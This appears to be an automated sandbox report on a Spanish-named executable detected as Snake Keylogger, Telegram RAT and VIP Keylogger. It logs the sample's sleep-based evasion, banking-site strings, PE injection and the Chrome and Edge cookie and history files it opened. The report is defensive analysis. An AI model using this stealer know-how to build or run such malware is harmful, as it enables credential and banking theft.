Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 2132	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -33204139332677172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7700	Thread sleep count: 8233 > 30	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7700	Thread sleep count: 1615 > 30	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -599756s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -599641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -599531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -599422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -599313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -599188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -599063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -598938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -598828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -598711s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -598609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -598499s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -598378s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -598266s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -598156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -598046s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -597938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -597828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -597719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -597609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -597500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -597390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -597281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -597172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -597063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -596938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -596813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -596688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -596578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -596469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -596344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -596234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -596125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -596016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -595906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -595797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -595687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -595578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -595469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -595344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -595234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -595125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -595016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -594905s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -594797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -594687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -594578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -594469s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 599756	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 598828	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 598711	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 598609	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 598499	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 598378	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 598266	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 598156	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 598046	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 597938	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 597828	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 597609	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 597500	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 597390	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 597281	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 597172	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 596813	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 596688	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 596234	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 596016	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 595797	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 595687	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 595016	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 594905	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 594797	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 594687	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 594469	Jump to behavior

Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696503903o
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696503903}
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696503903x
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696503903h
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696503903x
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696503903]
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696503903
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696503903\|UE
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696503903
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696503903
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696503903u
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696503903
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696503903
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696503903t
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3748822121.00000000014C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696503903}
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696503903x
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696503903t
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696503903s
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696503903
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $_qEmultipart/form-data; boundary=------------------------8dcfa7be7f62c54<
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696503903d
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696503903j
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696503903f
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696503903

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

Code function: 5_2_05C19548 LdrInitializeThunk,

5_2_05C19548

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

Memory written: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

Process created: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe "C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe"

Jump to behavior

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Queries volume information: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Queries volume information: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000005.00000002.3750107990.0000000003121000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 1388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 7336, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 1388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 7336, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
